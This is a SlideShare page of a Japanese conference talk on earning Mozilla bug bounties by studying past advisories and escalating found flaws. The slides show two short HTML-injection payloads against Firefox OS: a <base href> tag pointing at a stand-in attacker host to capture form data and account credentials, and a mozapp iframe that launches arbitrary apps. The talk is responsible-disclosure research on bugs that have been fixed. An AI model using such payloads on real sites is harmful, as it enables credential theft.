Submit Search
Upload
Mozillaの報奨金制度で100万円ほど稼いだ話
•
37 likes
•
14,278 views
Muneaki Nishimura
Follow
SECCON CTF 2014決勝戦・全国大会カンファレンスの発表資料です。
Read less
Read more
Technology
Slideshow view
Report
Share
Slideshow view
Report
Share
1 of 38
Download now
Download to read offline
Recommended
MQTTとAMQPとおまけ的に.NETを絡めた話です
MQTTとAMQPと.NET
MQTTとAMQPと.NET
terurou
I used these slides during my recent AMQP/RabbitMQ talk at a big web technology company in Chicago.
Introduction to AMQP Messaging with RabbitMQ
Introduction to AMQP Messaging with RabbitMQ
Dmitriy Samovskiy
WooYun WhiteHatFest 2016の発表資料です。
Find Blue Oceans - Through the Competitive World of Bug Bounty
Find Blue Oceans - Through the Competitive World of Bug Bounty
Muneaki Nishimura
「オワスプデイ in TOKYO 2016 Spring!!」の発表資料です。
OWASP Testing Guide からはじめよう - セキュリティ診断技術の共有、そして横展開
OWASP Testing Guide からはじめよう - セキュリティ診断技術の共有、そして横展開
Muneaki Nishimura
CODE BLUE 2015の発表資料です。
Firefoxの倒し方
Firefoxの倒し方
Muneaki Nishimura
セキュリティ・キャンプ全国大会2015の講義資料です。
Webプラットフォームのセキュリティ
Webプラットフォームのセキュリティ
Muneaki Nishimura
http2 RFC発行記念祝賀飲み会の発表資料です
Firefoxの日和見暗号がカジュアルに無効化された話
Firefoxの日和見暗号がカジュアルに無効化された話
Muneaki Nishimura
「第55回 HTML5とか勉強会」の発表資料です
Mozillaの報奨金制度で200万円ほど稼いだ話
Mozillaの報奨金制度で200万円ほど稼いだ話
Muneaki Nishimura
Recommended
MQTTとAMQPとおまけ的に.NETを絡めた話です
MQTTとAMQPと.NET
MQTTとAMQPと.NET
terurou
I used these slides during my recent AMQP/RabbitMQ talk at a big web technology company in Chicago.
Introduction to AMQP Messaging with RabbitMQ
Introduction to AMQP Messaging with RabbitMQ
Dmitriy Samovskiy
WooYun WhiteHatFest 2016の発表資料です。
Find Blue Oceans - Through the Competitive World of Bug Bounty
Find Blue Oceans - Through the Competitive World of Bug Bounty
Muneaki Nishimura
「オワスプデイ in TOKYO 2016 Spring!!」の発表資料です。
OWASP Testing Guide からはじめよう - セキュリティ診断技術の共有、そして横展開
OWASP Testing Guide からはじめよう - セキュリティ診断技術の共有、そして横展開
Muneaki Nishimura
CODE BLUE 2015の発表資料です。
Firefoxの倒し方
Firefoxの倒し方
Muneaki Nishimura
セキュリティ・キャンプ全国大会2015の講義資料です。
Webプラットフォームのセキュリティ
Webプラットフォームのセキュリティ
Muneaki Nishimura
http2 RFC発行記念祝賀飲み会の発表資料です
Firefoxの日和見暗号がカジュアルに無効化された話
Firefoxの日和見暗号がカジュアルに無効化された話
Muneaki Nishimura
「第55回 HTML5とか勉強会」の発表資料です
Mozillaの報奨金制度で200万円ほど稼いだ話
Mozillaの報奨金制度で200万円ほど稼いだ話
Muneaki Nishimura
「Shibuya.XSS in セキュリティ・キャンプ・フォーラム 2015」の発表資料です。
HPKP Supercookies (公開鍵ピンニングによるユーザ追跡)
HPKP Supercookies (公開鍵ピンニングによるユーザ追跡)
Muneaki Nishimura
Presentation materials of hasemunea (Yosuke HASEGAWA & nishimunea) for AVTOKYO2014.
Future of Web Security Opened up by CSP
Future of Web Security Opened up by CSP
Muneaki Nishimura
Shibuya.XSS テクニカルトーク#5の発表資料です。
Welcome to the Black Hole of Bug Bounty Program Rebooted
Welcome to the Black Hole of Bug Bounty Program Rebooted
Muneaki Nishimura
ng-mtg#6 AngularJS勉強会の発表資料です。
そろそろ押さえておきたい AngularJSのセキュリティ
そろそろ押さえておきたい AngularJSのセキュリティ
Muneaki Nishimura
HTML5 Nightの発表資料です。
Welcome to the Black Hole of Bug Bounty Program
Welcome to the Black Hole of Bug Bounty Program
Muneaki Nishimura
Enterprise x HTML5 Web Application Conference 2014の発表資料です。
Webアプリ開発者のためのHTML5セキュリティ入門
Webアプリ開発者のためのHTML5セキュリティ入門
Muneaki Nishimura
2013年12月19日に開催される「FxOS Gecko勉強会 その2 」の発表資料です。 2014年6月23日、アップデートしました。
GeckoのLocal Storageについて調べてみた
GeckoのLocal Storageについて調べてみた
Muneaki Nishimura
2013年9月30日に開催される「Geckoと仲良くなりたい人主催 FxOS Gecko勉強会」の発表資料です。
Firefox OS パッケージ型アプリ インストールの仕組みを調べてみた
Firefox OS パッケージ型アプリ インストールの仕組みを調べてみた
Muneaki Nishimura
2013年8月28日に開催される「関東Firefox OS勉強会 3rd ごった煮」の発表資料です。
Firefox OS 起動の仕組みを調べてみた
Firefox OS 起動の仕組みを調べてみた
Muneaki Nishimura
2024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
This is an introduction to MAPPO's paper.
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
atsushi061452
Jue Wang, Wentao Zhu, Pichao Wang, Xiang Yu, Linda Liu, Mohamed Omar, Raffay Hamid, " Selective Structured State-Spaces for Long-Form Video Understanding" CVPR2023 https://openaccess.thecvf.com/content/CVPR2023/html/Wang_Selective_Structured_State-Spaces_for_Long-Form_Video_Understanding_CVPR_2023_paper.html
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
Toru Tamaki
Syed Talal Wasim, Muzammal Naseer, Salman Khan, Ming-Hsuan Yang, Fahad Shahbaz Khan , "Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Grounding" arXiv2024 https://arxiv.org/abs/2401.00901v2
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
Toru Tamaki
2024/04/26の勉強会で発表されたものです。
新人研修 後半 2024/04/26の勉強会で発表されたものです。
新人研修 後半 2024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
CRI Japan, Inc.
Key topics covered: - Understanding Ballerina's role in integrations: features and advantages - Designing and implementing REST APIs for integration - Designing and implementing GraphQL services with Ballerina - Monitoring and observing applications - Introduction to data integration
Utilizing Ballerina for Cloud Native Integrations
Utilizing Ballerina for Cloud Native Integrations
WSO2
2024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
LoRaWANスマート距離検出センサー DS20Lカタログ
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
CRI Japan, Inc.
2024年5月8日 Power Platform 勉強会 #1 LT資料
知識ゼロの営業マンでもできた!超速で初心者を脱する、悪魔的学習ステップ3選.pptx
知識ゼロの営業マンでもできた!超速で初心者を脱する、悪魔的学習ステップ3選.pptx
sn679259
More Related Content
More from Muneaki Nishimura
「Shibuya.XSS in セキュリティ・キャンプ・フォーラム 2015」の発表資料です。
HPKP Supercookies (公開鍵ピンニングによるユーザ追跡)
HPKP Supercookies (公開鍵ピンニングによるユーザ追跡)
Muneaki Nishimura
Presentation materials of hasemunea (Yosuke HASEGAWA & nishimunea) for AVTOKYO2014.
Future of Web Security Opened up by CSP
Future of Web Security Opened up by CSP
Muneaki Nishimura
Shibuya.XSS テクニカルトーク#5の発表資料です。
Welcome to the Black Hole of Bug Bounty Program Rebooted
Welcome to the Black Hole of Bug Bounty Program Rebooted
Muneaki Nishimura
ng-mtg#6 AngularJS勉強会の発表資料です。
そろそろ押さえておきたい AngularJSのセキュリティ
そろそろ押さえておきたい AngularJSのセキュリティ
Muneaki Nishimura
HTML5 Nightの発表資料です。
Welcome to the Black Hole of Bug Bounty Program
Welcome to the Black Hole of Bug Bounty Program
Muneaki Nishimura
Enterprise x HTML5 Web Application Conference 2014の発表資料です。
Webアプリ開発者のためのHTML5セキュリティ入門
Webアプリ開発者のためのHTML5セキュリティ入門
Muneaki Nishimura
2013年12月19日に開催される「FxOS Gecko勉強会 その2 」の発表資料です。 2014年6月23日、アップデートしました。
GeckoのLocal Storageについて調べてみた
GeckoのLocal Storageについて調べてみた
Muneaki Nishimura
2013年9月30日に開催される「Geckoと仲良くなりたい人主催 FxOS Gecko勉強会」の発表資料です。
Firefox OS パッケージ型アプリ インストールの仕組みを調べてみた
Firefox OS パッケージ型アプリ インストールの仕組みを調べてみた
Muneaki Nishimura
2013年8月28日に開催される「関東Firefox OS勉強会 3rd ごった煮」の発表資料です。
Firefox OS 起動の仕組みを調べてみた
Firefox OS 起動の仕組みを調べてみた
Muneaki Nishimura
More from Muneaki Nishimura
(9)
HPKP Supercookies (公開鍵ピンニングによるユーザ追跡)
HPKP Supercookies (公開鍵ピンニングによるユーザ追跡)
Future of Web Security Opened up by CSP
Future of Web Security Opened up by CSP
Welcome to the Black Hole of Bug Bounty Program Rebooted
Welcome to the Black Hole of Bug Bounty Program Rebooted
そろそろ押さえておきたい AngularJSのセキュリティ
そろそろ押さえておきたい AngularJSのセキュリティ
Welcome to the Black Hole of Bug Bounty Program
Welcome to the Black Hole of Bug Bounty Program
Webアプリ開発者のためのHTML5セキュリティ入門
Webアプリ開発者のためのHTML5セキュリティ入門
GeckoのLocal Storageについて調べてみた
GeckoのLocal Storageについて調べてみた
Firefox OS パッケージ型アプリ インストールの仕組みを調べてみた
Firefox OS パッケージ型アプリ インストールの仕組みを調べてみた
Firefox OS 起動の仕組みを調べてみた
Firefox OS 起動の仕組みを調べてみた
Recently uploaded
2024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
This is an introduction to MAPPO's paper.
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
atsushi061452
Jue Wang, Wentao Zhu, Pichao Wang, Xiang Yu, Linda Liu, Mohamed Omar, Raffay Hamid, " Selective Structured State-Spaces for Long-Form Video Understanding" CVPR2023 https://openaccess.thecvf.com/content/CVPR2023/html/Wang_Selective_Structured_State-Spaces_for_Long-Form_Video_Understanding_CVPR_2023_paper.html
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
Toru Tamaki
Syed Talal Wasim, Muzammal Naseer, Salman Khan, Ming-Hsuan Yang, Fahad Shahbaz Khan , "Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Grounding" arXiv2024 https://arxiv.org/abs/2401.00901v2
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
Toru Tamaki
2024/04/26の勉強会で発表されたものです。
新人研修 後半 2024/04/26の勉強会で発表されたものです。
新人研修 後半 2024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
CRI Japan, Inc.
Key topics covered: - Understanding Ballerina's role in integrations: features and advantages - Designing and implementing REST APIs for integration - Designing and implementing GraphQL services with Ballerina - Monitoring and observing applications - Introduction to data integration
Utilizing Ballerina for Cloud Native Integrations
Utilizing Ballerina for Cloud Native Integrations
WSO2
2024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
iPride Co., Ltd.
LoRaWANスマート距離検出センサー DS20Lカタログ
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
CRI Japan, Inc.
2024年5月8日 Power Platform 勉強会 #1 LT資料
知識ゼロの営業マンでもできた!超速で初心者を脱する、悪魔的学習ステップ3選.pptx
知識ゼロの営業マンでもできた!超速で初心者を脱する、悪魔的学習ステップ3選.pptx
sn679259
Recently uploaded
(10)
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その22024/04/26の勉強会で発表されたものです。
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
論文紹介: The Surprising Effectiveness of PPO in Cooperative Multi-Agent Games
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
論文紹介:Selective Structured State-Spaces for Long-Form Video Understanding
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
論文紹介:Video-GroundingDINO: Towards Open-Vocabulary Spatio-Temporal Video Groun...
新人研修 後半 2024/04/26の勉強会で発表されたものです。
新人研修 後半 2024/04/26の勉強会で発表されたものです。
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
LoRaWAN スマート距離検出デバイスDS20L日本語マニュアル
Utilizing Ballerina for Cloud Native Integrations
Utilizing Ballerina for Cloud Native Integrations
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
Amazon SES を勉強してみる その32024/04/26の勉強会で発表されたものです。
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
LoRaWANスマート距離検出センサー DS20L カタログ LiDARデバイス
知識ゼロの営業マンでもできた!超速で初心者を脱する、悪魔的学習ステップ3選.pptx
知識ゼロの営業マンでもできた!超速で初心者を脱する、悪魔的学習ステップ3選.pptx
Mozillaの報奨金制度で100万円ほど稼いだ話
1.
Mozillaの報奨金制度で 100万円ほど稼いだ話 SECCON CTF 2014全国大会カンファレンス 2015年2月7日@東京電機大学 Welcome
to the Black Hole of Bug Bounty Program –RESOLVED FIXED-
2.
にしむねあ Weekend Bug Hunter Lecturer
of Security Camp 2014
3.
この3か月間で11,500ドル 2014.11 $3000 Bug
1069762 2014.12 $6000 Bug 1101158 Bug 1102204 2015.01 $2500 Bug 1065909 Bug 1106713
4.
実は9か月間でも11,500ドル 5月 6月 7月
8月 9月 10月 11月 12月 1月5 6 7 8 9 10 11 12 1 $3000 $6000 $2500 $0 $0 $0 $0 $0 $0
5.
実は9か月間でも11,500ドル 5月 6月 7月
8月 9月 10月 11月 12月 1月5 6 7 8 9 10 11 12 1 苦悩の6か月
6.
苦悩の6か月で見つけた バグ探しのメソッドを紹介します (今後の稼ぎに支障のない範囲で)
7.
その1 過去に学ぶ
8.
https://www.mozilla.org/en-US/security/advisories/
9.
• 過去の脆弱性情報から、発生した箇所と 攻撃方法を洗い出す • 同じ攻撃を他の箇所で試してみる •
歴史は繰り返す
10.
https://www.mozilla.org/en-US/security/advisories/mfsa2012-53/
11.
2012年7月 : CVE-2012-1963 CSPの違反レポートを利用して OAuth
2.0のアクセストークンなどを盗むことができた
12.
https://www.mozilla.org/en-US/security/advisories/mfsa2014-86/
13.
14.
CSPのコードをC++で書き直した際に 同じ脆弱性が再発
15.
16.
その2 見つけた脆弱性を 最大限に悪用する
17.
• 発見報告して終わりじゃもったいない • 最悪のシナリオを示すことで、 脆弱性の価値は高めることができる
18.
深刻度がHigh以上でないと報奨金は出ない Critical $3000 High $3000 Moderate
無し (たまに減額支給) Low 無し https://www.mozilla.org/en-US/security/bug-bounty/
19.
公表されていないが Firefox OSも報奨金の対象
20.
http://www.slideshare.net/dynamis/future-with-firefox-os
21.
すべてWeb技術で <s>pwn
22.
すべてWeb技術で
23.
そういうことか
24.
• Firefox OSでは、権限の高いアプリには CSPが適用される •
任意のHTMLやCSSは注入できても スクリプトは注入できない
25.
スクリプトを一切使わずに HTMLだけで悪さをする方法を考えた
26.
攻撃① baseタグを注入 <base href=http://evil.tld>
27.
• ベースURLを操作することにより 相対パス指定URLの通信先を変更する • フォームの入力内容を攻撃者のサーバに 送信させるといった攻撃が可能
28.
端末から来るHTTPリクエストを監視
29.
Firefoxアカウントの認証画面を取りに来た
30.
偽の認証ページを配信すれば Firefoxアカウントの認証情報を盗める
31.
攻撃② 特殊な<iframe>を注入 <iframe mozapp
src=…>
32.
• Firefox OSのアプリは特殊な iframeの上で起動する •
iframeを注入することにより 任意のアプリを実行させることができる
33.
先程の画面でFM Radioアプリが起動
34.
HTMLインジェクション1件で 30万円貰えるボーナスゲームに
35.
36.
まとめ
37.
① 過去に学ぶ ② 見つけた脆弱性を最大限に悪用する 本日紹介したメソッド
Download now